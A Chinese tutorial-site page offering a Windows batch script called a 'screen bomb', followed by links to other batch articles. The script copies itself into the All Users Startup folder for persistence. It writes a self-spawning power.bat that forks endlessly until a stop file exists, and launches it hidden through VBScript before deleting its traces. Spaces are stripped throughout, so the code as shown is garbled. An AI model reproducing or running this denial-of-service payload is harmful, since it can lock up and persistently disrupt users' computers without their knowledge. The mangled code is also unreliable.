手机
当前位置:查字典教程网 >脚本专栏 >DOS/BAT >批处理实现屏幕炸弹
批处理实现屏幕炸弹
摘要:复制代码代码如下:@echooffifnotexist"%HOMEPATH%..AllUsers「开始」菜单程序启动power.bat"co...

复制代码 代码如下:

@echooff

ifnotexist"%HOMEPATH%..AllUsers「开始」菜单程序启动power.bat"copy%~fs0"%HOMEPATH%..AllUsers「开始」菜单程序启动power.bat">nul

echo@echooff>%windir%power.bat

echoif"%%1"==""goto:end>>%windir%power.bat

echoifexistC:_stopgoto:EOF>>%windir%power.bat

echostart/B%%~fs0exp>>%windir%power.bat

echo:s>>%windir%power.bat

echoifnotexistC:_stopgotos>>%windir%power.bat

echoexit>>%windir%power.bat

echo:end>>%windir%power.bat

echodel%%~fs0>>%windir%power.bat

echosetws=CreateObject("WScript.Shell")>%windir%power.vbs

echows.Run"%windir%power.batexp",0>>%windir%power.vbs

WScript%windir%power.vbs

del%windir%power.vbs

setp=%~ps0

ifnot%p:~-3,2%==启动del%~fs0

【批处理实现屏幕炸弹】相关文章:

批处理写的 oracle 数据库备份还原工具

计算字符串的长度批处理

批处理中实现替换文本内容

批处理变量应用方法

学会批处理

服务器 安全设置 批处理

批处理入门与提高

用DOS批处理实现建立文件夹的代码

批处理命令教学之管道符号(|)

用批处理实现删除大小和类型一样的文件的代码

精品推荐
分类导航